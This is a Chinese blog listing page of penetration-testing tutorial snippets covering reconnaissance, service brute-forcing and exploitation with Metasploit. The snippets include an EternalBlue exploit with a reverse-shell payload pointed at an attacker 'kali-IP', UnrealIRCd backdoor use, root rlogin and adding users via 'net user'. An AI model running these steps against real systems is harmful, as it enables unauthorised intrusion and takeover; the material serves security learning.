黑客技术分享
关注
分享
扫一扫
文章平均质量分 58
lao_wine
一个愿意为网络安全事业奋斗终生的人
展开
-
渗透必学html基础
title: HTML文章目录title: HTML一、基础1、简单的HTML页面架构2、HTML常见标签metalinkscript注释P标题标签brhr文本属性pre3、form表单和input标签form表单inputa标签、img标签、table标签aimg与areatable基础单选框、复选框,下拉选框、文本域下拉选框文本域 textarea本章综合示例列表无序列表有序列表补充frameset属性scrolling一、基础1、简单的HTML页面架构<!DOCTYPE html>.原创 2021-06-05 23:22:42 · 520 阅读 · 0 评论 -
攻防-域名信息、子域名收集、web站点信息收集、端口信息收集、敏感信息收集的方法、实践
文章目录一、域名信息收集域名介绍whois介绍whois查询备案信息查询二、子域名信息收集子域名介绍挖掘子域名的重要性子域名挖掘工具三、web站点信息收集CMS指纹识别四、端口信息收集端口介绍端口信息收集端口攻击防御措施五、敏感信息收集敏感信息收集的重要性Google Hack语法HTTP响应收集Server信息Github信息泄露一、域名信息收集域名介绍域名(Domain Name),是由一串用点分割的名字组成的internet上某一台计算机或计算机组的名称,用于计算机数据传输时标识计算机的电子方原创 2020-10-06 01:10:34 · 1413 阅读 · 0 评论 -
web渗透--权限维持
远程控制生成与上传metasploitmsfcoslesearch ms17-010use exploit/windows/smb/ms170_010_eternablueshow options设置rhostsshow payloadsset payload windows/x64/meterpreter/reverse_tcp 设置反弹shellshow optionsset lhost kali-IPexploit/run远程控制使用njRAT原创 2020-09-29 19:32:53 · 189 阅读 · 0 评论 -
web渗透--提权辅助工具Windows-Exploit-Suggester
辅助工具介绍辅助工具Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标潜在的缺失补丁。必须在python2环境中运行python2 -m pip install xlrdpython2 windows-exploit-suggester.py --update 得到2020-09-23-mssb.xls文件python2 windows-exploit-suggester.py -husage: windows-expl原创 2020-09-23 18:50:34 · 502 阅读 · 0 评论 -
web渗透--提权基础
提权的本质提权本质就是提升自己在服务器中的权限,获得更大的权限提权分类本地提权远程提权系统提权第三方软件提权权限配置一般情况下,web服务会给与一个特定低权限用户维护服务,避免给与过高权限。net user username password /addWindows系统提权基础命令获取IP地址信息IP地址是计算机在网络中的门牌号,用来寻找计算机的地址。同一台计算机有多个IP地址,可以有外部连接的IP地址,内部IP地址。在提权过程中,如果外网IP地址,可以直接使用33原创 2020-09-23 03:16:17 · 494 阅读 · 0 评论 -
web渗透--tomcat管理密码破解
tomcat介绍tomcat服务器是一个免费的开放源码的web应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合普遍使用,是开发和调试JSP程序的首选。默认8180端口是tomcat管理的HTTP端口探测目标tomcatnmap -sV 目标IP地址 -p 8180探测tomcat的版本信息msf破解tomcat密码msfconsoleuse auxiliary/scanner/http/tomcat_mgr_loginset rhost、 rportr原创 2020-09-13 03:04:27 · 832 阅读 · 0 评论 -
web渗透--irc后门利用
irc介绍IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。端口号默认的是6667号端口探测ircnmap -sV 目标IP地址 -p 端口号msf利用irc后门使用searchsploit查看可以利用的POCmsfconsoleuse exploit/unix/irc/unreal_ircd_3281_backdoorshow optionsset rhosts 目标IP地址runsessions -lsessions原创 2020-09-13 03:03:55 · 787 阅读 · 0 评论 -
web渗透--vnc密码破解
vnc介绍VNC(Virtual Network Console)是虚拟网络控制台的缩写。他是一款优秀的远程控制工具软件。可视化控制,类似于远程桌面。默认vnc服务端运行在5900端口。探测目标vncnmap -sV 目标IP地址 -p 5900获取vnc版本信息vnc破解在msf下vnc_login模块可用来对vnc服务端认证用户名和密码进行破解。msfconsoleuse auxiliary/scanner/vnc/vnc_loginshow optionetssset设原创 2020-09-12 01:44:56 · 1723 阅读 · 0 评论 -
web渗透--postgresql密码破解,简单漏洞利用
postgresql介绍postgresql是对象基础型数据库管理系统,支持大部分SQL标准并且提供了许多其他的现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。一般使用的是5432端口号。https://www.postgresql.org/探测postgresqlkeyinmap -sV 目标IP地址 -p 5432探测目标postgresql版本信息。msf下post原创 2020-09-12 01:44:25 · 1265 阅读 · 0 评论 -
web渗透--mysql弱口令破解
mysql介绍是一种关系数据库管理系统,关系数据库将数据保存在不同的表中。而不是将数据放在一个大仓库内,这样就提高了速度和灵活性。默认端口是3306www.mysql.com探测目标mysqlnmap -sV 目标IP地址 -p 端口探测mysql的版本信息msf破解mysql密码使用msf下的mysql_login模块破解mysql登录用户名和密码msfconsoleuse auxiliary/scanner/mysql/mysql_login设置目标IP地址 端口 用户名/原创 2020-09-10 17:16:34 · 549 阅读 · 0 评论 -
web渗透--nfs获取目标的密码文件
nfs介绍NFS(Network File System网络文件系统),是FreeBSD支持的文件系统的一种,允许网络中的计算机之间通过TCP/IP网络共享。在NFS应用中,本地的NFS的客户端可以透明地读写位于远端NFS服务器上的文件,就像浏览本地文件一样。nmap -sV 目标IP 查看是否打开了nfs一般nfs是2049号 端口探测nfsnmap --script=nfs-* 目标IP地址#探测nfs是否可以导出apt install nfs-common使用sho原创 2020-09-10 16:25:30 · 256 阅读 · 0 评论 -
web渗透--proftpd测试
proftpd介绍ProFTPD:是一个Unix平台或类Unix平台上的FTP服务器程序。http://www.proftpd.org探测目标proftpdnmap -sV 目标IP地址 -p 2121探测出目标的proftpd版本信息exploit-db搜索目标漏洞在https://www.exploit-db.com/ 输入对应软件及版本信息搜索是否有漏洞searchsploit 软件及版本号暴力破解使用metasploitmsfcosoleuse auxiliar原创 2020-09-10 16:24:55 · 391 阅读 · 0 评论 -
web渗透--反序列化远程漏洞利用
java rmi介绍JAVA RMI指的是远程方法调用(Remote Method Lovncation),是一种机制,可以让一个JAVA虚拟机上的对象去调用另外一个JAVA虚拟机上的对象的一种方法。RMI是J2SE的一部分,能够让程序员开发出基于Java的分布式应用,一个RMI对象是一个JAVA远程对象,可以从另一个JAVA虚拟机(或跨越网络)调用他的方法,可以像调用本地的JAVA对象一样调用远程JAVA对象。使分布在不同的JVM中的对象外表和行为都像本地对象一样,对于任何一个以对象为参数的RMI接口原创 2020-09-10 14:54:35 · 351 阅读 · 0 评论 -
web渗透--rlogin最高权限登
rlogin介绍远程登录(rhost)是一个UNIX的命令,它允许授权用户进入到网络中其他的UNIX机器,就像在现场操作一样。一旦进入主机,可以操作主机允许的任何事情。login、exec是标配。nmap 目标IP 查看端口号探测目标rlogin使用 nmap -sV 目标IP -p 端口号 探测目标rlogin版本信息exec对远程执行的进程进行验证login反弹bash shellrlogin最高权限登录rlogin -l root 目标IP地址原创 2020-09-10 14:54:00 · 571 阅读 · 0 评论 -
web渗透--samba RCE远程命令执行漏洞利用及修复
samba介绍samba是在linux与UNIX系统上实现SMB协议(文件共享协议,Server Messages Block,信息服务块)的一个免费软件。由服务端和客户端(C/S)程序构成。SMB是在局域网共享文件和打印机的一种通讯协议,他主要为局域网内的不同计算机之间提供文件、打印机等资源的共享服务,一般运行在139、445端口上。探测目标samba使用nmap -sV IP地址 -p 端口号 探测目标端口服务版本信息。metasploit漏洞利用使用metasploit集成的原创 2020-09-09 15:27:53 · 747 阅读 · 0 评论 -
web渗透--rpcbind利用
rpcbind介绍rpcbind是NFS(网络文件共享协议)中进行消息通知的服务,一般是111端口,并且NFS配置开启rpcbind_enable=“YES”探测目标rpcbindnmap -sV IP地址 -p 端口eg:nmap -sV 192.168.207.133 -p 111searchsplioit rpcbind //查看是否有可利用的脚本nmap脚本探测nmap使用nmap -p 端口号 --script=rpcinfo 目标IP地址 来探测目标IP地址的rpci原创 2020-09-09 14:40:28 · 7967 阅读 · 1 评论 -
telnet的的基本介绍,爆破,连接、提权
一、Telnel介绍 Telnet协议是TCP/IP协议族中的一员,是internet远程登录服务的标准协议和主要方式,他为使用者在本地计算机上完成远程主机工作的能力。Telnet简单实用,但因为是明文传送协议(安全性不足),所以并不被重用。一般服务器上都会禁用Telnet服务,要使用就要主动在服务端开启Telnet服务。Telnet默认使用的是23号端口。二、Telnet的版本号 1、nmap获取 1)、nmap IP地址。 2)、nmap -p...原创 2020-09-05 23:59:43 · 1140 阅读 · 0 评论 -
web渗透--telnet介绍、获取banner、爆破口令、连接
一、Telnel介绍 Telnet协议是TCP/IP协议族中的一员,是internet远程登录服务的标准协议和主要方式,他为使用者在本地计算机上完成远程主机工作的能力。Telnet简单实用,但因为是明文传送协议(安全性不足),所以并不被重用。一般服务器上都会禁用Telnet服务,要使用就要主动在服务端开启Telnet服务。Telnet默认使用的是23号端口。二、Telnet的版本号 1、nmap获取 1)、nmap IP地址。 2)、nmap -p...原创 2020-08-28 23:12:45 · 757 阅读 · 0 评论 -
web渗透--ssh环境搭建、banner获取。爆破口令、安全防范
一、SSH环境搭建 1、Ubuntu搭建ssh服务端 1)、安装软件openssh-server(apt-get install openssh-server) 2)、ssh服务端服务启动与关闭 service ssh start 启动 service ssh status 状态获取 service ssh stop 关闭 ...原创 2020-08-28 23:10:40 · 496 阅读 · 0 评论 -
web渗透--ftp暴力破解,明文、嗅探安全等
一、 FTP用户名密码暴力破解 1、知道用户名和密码nc直接相连 2、知道用户名不知道密码 1、medusa工具 medusa -d 可以查看可以破解模块都有什么 medusa -h IP地址 -u 用户名 -P 字典 ftp二、FTP用户名明文密码验证 1、FTP协议中用户认证的过程,客户端和用户端都是采用的明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。 2、用wireshark...原创 2020-08-27 00:28:23 · 1579 阅读 · 0 评论 -
web渗透--FTP安全
一、FTP协议介绍 1、文件传输协议(File Transfer Protocol,缩写:FTP),是网络上进行文件传输的一套标准协议,使用客户/服务器模式(C/S)模式。它属于网络传输协议的应用层。FTP使用21号端口。 2、FTP将用户分为3类:Real用户、Administrator(管理者)、匿名用户。 3、FTP文件传输格式分为了两类:ASCLL、二进制格式。二、FTP匿名登录漏洞 1、FTP默认是没有禁止匿名用户,所以可以进行Anonymous(匿名)...原创 2020-08-26 14:46:42 · 396 阅读 · 0 评论 -
web渗透--漏洞扫描与利用杂论
一、漏洞扫描原理 扫描器通过发送对应的验证数据到目标具体服务进行验证。当收到目标返回的响应与存在的漏洞响应一致时,表明有漏洞。二、漏洞扫描工具 1、漏洞扫描工具--nmap 使用nmap也可以进行漏洞扫描: nmap --script vuln 目标IP地址 2、漏洞扫描工具--Nessus三、漏洞利用--metasploit 1、利用Metasploit对扫描到的漏洞加以利用。 2、步骤: 1、终端输入...原创 2020-08-26 13:38:22 · 528 阅读 · 0 评论 -
web渗透--端口详解
一、端口的基本介绍 端口(port),一般认为是设备与通讯交流的出口。端口可以分为是虚拟端口和物理端口,其中的虚拟端口指的是计算机内部端口,不可见,例如计算机的80端口、21端口、23端口。 多个服务可以通过一个IP地址实现,并且通过“IP地址+端口号”来区分不同的服务。因此,一个开放的端口代表一个提供的服务,不同的服务具有不同的端口号,所以要对服务进行测试就要先确定是否开放了对应端口号。二、扫描工具 1、nmap IP地址 2、dmitry -p 3、...原创 2020-08-23 20:02:34 · 2637 阅读 · 0 评论 -
web渗透--主机发现
一、OSI分层 1、OSI(Open System Interconnect),开放式系统互联,他将网络分为七层,每一层发送信息都是单进行。具体模型如下图(下图为网络中寻找,如有侵权,请告知)二、二层主机发现 1、二层主机发现主要是利用的OSI中链路层进行主机发现。链路层发送对应的帧,主要利用的是arp协议(地址解析协议)。二层主机优点(局域网中通通信使用ARP协议,利用MAC地址作为对应的识别地址): 速度快、可靠性高。但是无法扫描经过路由的主机。 ...原创 2020-08-23 01:18:30 · 335 阅读 · 0 评论 -
web渗透--ICMP扫描详解
ICMP扫描 ICMP(Internet Control Message Protocal,因特网控制报文协议)工作在OSI上网络层,向数据通信中的源主机报告错误。ICMP就是一个“错误的侦测与回报机制”,目的是为了能够检测网络的连续状况,也能够确保连续的准确性。通过实施ICMP Ping扫描,可以发现目标主机是否活动。一、ICMP工作机制 ICMP是TCP/IP的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息指的是网络通不通、主机是否可达、路由是否可用等网络本身的消息。当遇...原创 2020-08-13 13:44:06 · 5326 阅读 · 0 评论 -
网络扫描杂论
一、扫描目的 目的:网络扫描可以让用户发现网络中活动的主机和主机开放的端口,从而判断目标主机开放的服务。然后通过对服务的扫描,获取目标主机的操作系统类型、服务信息版本等信息。1-1 主机的发现 通过对一个网络中的主机进行扫描,便可以发现该网络中活动的主机。当发现网络中活动的主机后,然后重新规划扫描范围进行扫描(不必对所有主机进行扫描),扫描出活动主机开放的端口,从而判断出开放的服务信息。1-2 探测端口 扫描到网络中的活动的主机后,即可探测该主机的开放的所有端口(特指TCP/I...原创 2020-08-03 14:56:53 · 622 阅读 · 0 评论 -
网站建设
http协议超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法静态网站静态网站是指全部由HTML(标准通用标记语言的子集)代码格式页面组成的网站,所有的内容包含在网页文件中。网页上也可以出现各种视觉的动态效果,如GIF动画、原创 2018-01-27 20:29:50 · 590 阅读 · 0 评论 -
渗透流程
明确范围明确范围确定规则确定需求信息收集基本信息系统信息应用信息版本信息服务信息人员信息防护信息漏洞探测系统漏洞WebServer漏洞Web应用漏洞其他端口服务漏洞通信安全漏洞验证自动化验证手工验证实验验证登录猜解业务漏洞验证公开资源的利用信息分析精准打击绕过防御机制定制攻击路径绕过检测机制攻击代码获取所需实施攻击获取内部信息进一步原创 2018-01-27 20:27:44 · 738 阅读 · 0 评论